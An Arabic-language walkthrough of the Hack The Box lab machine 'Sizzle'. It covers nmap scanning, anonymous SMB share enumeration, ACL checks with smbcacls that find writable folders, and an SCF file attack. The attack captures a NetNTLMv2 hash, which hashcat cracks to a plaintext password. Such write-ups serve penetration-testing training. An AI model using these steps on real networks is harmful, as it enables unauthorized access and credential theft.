Sizzle - بالعربي

حل sizzle بالعربي

‍Recon

nmap

nmap -sV -sC -F -Pn 10.10.10.103

استخدمت -F كرمال يعمل ال scan او الفحص بسرعة لاني جيت و عملت -p- لكل ال ports و طول كتير

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 01:49 EDT
Nmap scan report for 10.10.10.103
Host is up (0.49s latency).
Not shown: 92 filtered ports
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
443/tcp open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
445/tcp open  microsoft-ds?
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15m53s, deviation: 0s, median: 15m53s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-19T06:06:25
|_  start_date: 2021-05-19T00:11:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.26 seconds

في بالنتائج sizzle.htb.local ضيفه لل

/etc/hosts

FTP

ادخل ك anonymous ب مستخدم و كلمة سر anonymous / anonymous

متل ما شايف لاشيء, فقررت اتجه للويب

‌‌Web :80

شكل الموقع

السورس كود مافيو شي

تفقد الويب, تقفد ال 445 port اتفقد ال ssl certificate ليكون في شي هنيك انا ما انتبهتلو, عملت directory enum و لقيت كم شغلة مثيرة للاهتمام بس ما مفيدة جدا

هون 403 و ممنوع في شوية طرق و تريكات ممكن نجربها بس حاليا ما رح جربها و امشي للبعده و لو ما زبط معي شي بعدين برجع لهون و بجرب

بالمسار هاد

https://sizzle.htb.local/certsrv

عم يطلب اسم مستخدم و كلمة سر و هيدا اصلا simple authentication و بطبيعة الحال ممكن نعمل عليه تخمين

, رحت لل SMB

SMB

smbclient -L 10.10.10.103
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        CertEnroll      Disk      Active Directory Certificate Services share
        Department Shares Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Operations      Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

القرص الاسمه CertEnroll مثير للاهتمام لانو فوق بالويب عنا نفس المسار بس ما النا صلاحيات نعمل فيه شي, ف نروح لل Department Shares

smbclient "//10.10.10.103/Department Shares"
smb: \> dir
  .                                   D        0  Tue Jul  3 11:22:32 2018
  ..                                  D        0  Tue Jul  3 11:22:32 2018
  Accounting                          D        0  Mon Jul  2 15:21:43 2018
  Audit                               D        0  Mon Jul  2 15:14:28 2018
  Banking                             D        0  Tue Jul  3 11:22:39 2018
  CEO_protected                       D        0  Mon Jul  2 15:15:01 2018
  Devops                              D        0  Mon Jul  2 15:19:33 2018
  Finance                             D        0  Mon Jul  2 15:11:57 2018
  HR                                  D        0  Mon Jul  2 15:16:11 2018
  Infosec                             D        0  Mon Jul  2 15:14:24 2018
  Infrastructure                      D        0  Mon Jul  2 15:13:59 2018
  IT                                  D        0  Mon Jul  2 15:12:04 2018
  Legal                               D        0  Mon Jul  2 15:12:09 2018
  M&A                                 D        0  Mon Jul  2 15:15:25 2018
  Marketing                           D        0  Mon Jul  2 15:14:43 2018
  R&D                                 D        0  Mon Jul  2 15:11:47 2018
  Sales                               D        0  Mon Jul  2 15:14:37 2018
  Security                            D        0  Mon Jul  2 15:21:47 2018
  Tax                                 D        0  Mon Jul  2 15:16:54 2018
  Users                               D        0  Tue Jul 10 17:39:32 2018
  ZZ_ARCHIVE                          D        0  Mon Jul  2 15:32:58 2018

                7779839 blocks of size 4096. 3552765 blocks available

ننزلهم بالاول

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

جوا ال users رح تلاقي اسماء مستخدمين هدول ممكن تاخدهم ك user list حاولت ابحبش هون و هنيك و ماطلعت بشي فهون قعدت افكر في شغلة ممكن نطلع عليها و هو ازا في الك صلاحيات الكتابة على ال disks و الصراحة ما بتذكر ولا ب pentest ولا ب bug hunting شفت يهي موجودة, بس بالاخر هي CTF و كلو ممكن ف رح نعمل الاتي

اول شي اعمل مجلد 

mkdir mount

تاني شي بأمر mount اعمل mount لل disk لملف الي سويته من شوي 

sudo mount -t cifs  "//10.10.10.103/Department Shares" mount

رح يطلب منك كلمة سر كلاتي, اضغط enter و بس

Password for root@//10.10.10.103/Department Shares:

اعمل ls -la

طيب متل ما شايف هي الملفات تبعيتنا , حسب الصلاحيات الي بالاحمر انو انا فيني اكتب على الموجود بما اني رووت فخلينا نجرب نكتب , نعمل ملف مثلا

متل ما هو واضح Permission denied, من الاخر يا معلم عم يأحطلنا (ينفض, يطرد,يقلع ... الخ من المرادفات الظريفة) فاجا ببالي اني اعمل one line command هاد عبارة عن امر باش من سطر واحد بدخل و يجرب يكتب بكل المجلدات

‌Enum write permission first shot

for i in $(ls);do touch $i/test.txt;done
touch: cannot touch 'Accounting/test.txt': Permission denied
touch: cannot touch 'Audit/test.txt': Permission denied
touch: cannot touch 'Banking/test.txt': Permission denied
touch: cannot touch 'CEO_protected/test.txt': Permission denied
touch: cannot touch 'Devops/test.txt': Permission denied
touch: cannot touch 'Finance/test.txt': Permission denied
touch: cannot touch 'HR/test.txt': Permission denied
touch: cannot touch 'Infosec/test.txt': Permission denied
touch: cannot touch 'Infrastructure/test.txt': Permission denied
touch: cannot touch 'IT/test.txt': Permission denied
touch: cannot touch 'Legal/test.txt': Permission denied
touch: cannot touch 'M&A/test.txt': Permission denied
touch: cannot touch 'Marketing/test.txt': Permission denied
touch: cannot touch 'R&D/test.txt': Permission denied
touch: cannot touch 'Sales/test.txt': Permission denied
touch: cannot touch 'Security/test.txt': Permission denied
touch: cannot touch 'Tax/test.txt': Permission denied
touch: cannot touch 'Users/test.txt': Permission denied
touch: cannot touch 'ZZ_ARCHIVE/test.txt': Permission denied

طبعا يال الجمال كلو permission denied, بس لا للإستسلام لا للتراجع

Enum write permission second shot

اتذكرت انو باداة smbcacls ممكن اشوف الأذونات او بالضبط ال ACL !

اول شي نشوف المجلدات الاساسية متل ما عملنا اول مرة بس هي المرة بأداة smbcacls 

for i in $(ls);do echo "\n"$i;smbcacls -N "//10.10.10.103/Department Shares" $i;done

المفروض يطلعلك متل هيك

Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Audit
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Banking
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

CEO_protected
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Devops
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Finance
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

HR
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Infosec
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Infrastructure
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

IT
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Legal
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

M&A
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Marketing
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

R&D
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Sales
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Security
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Tax
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

نحن عم نطلع على ال ACL الي هي 

ACL:Everyone:ALLOWED/OI|CI/FULL

هي بتعني ان الكل عند الأذونات و الوصول الكامل, عنا ال ZZ_ARCHIVE عنده هي ال ACL هاد بعني انو منقدر نكتب هون

هلق نشوف الي جوا هي المجلدات

for i in $(ls);for x in $(ls $i);do echo "\n"$i"/"$x;smbcacls -N "//10.10.10.103/Department Shares" $i/$x;done

رح تطلعلك كمية داتا كتير, بس رح تلاقي ال ACL البدنا ب

/Users/Public

Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

هيك عنا مكانين منقدر نكتب فيهم

Exploit

SCF File Attack

كل هي العملية ليش؟ لانو في نوع هجوم اسمو SCF File Attack (اضغط هنا)

amanda::HTB:9be9fd34c0e927f8:BBA79C2B7D92BD323728695003F2D7CA:0101000000000000C0653150DE09D201C447124086C661E1000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000010000000020000047E5928C44FD28913B4318D651F8DE351D58BDD648F9FF9C56F18F7743C915B70A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E00310036003000000000000000000000000000
hashcat.exe -m 5600 amanda_ntlmhash.txt rockyou.txt -d 1
AMANDA::HTB:9be9fd34c0e927f8:bba79c2b7d92bd323728695003f2d7ca:0101000000000000c0653150de09d201c447124086c661e1000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c000300340057004
9004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000010000000020000047e5928c44fd28913b4318d651f8de351d58bdd648f9
ff9c56f18f7743c915b70a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e00310036003000000000000000000000000000:Ashare1972

CREDS: amanda:Ashare1972

PreviousMantis - بالعربي

Last updated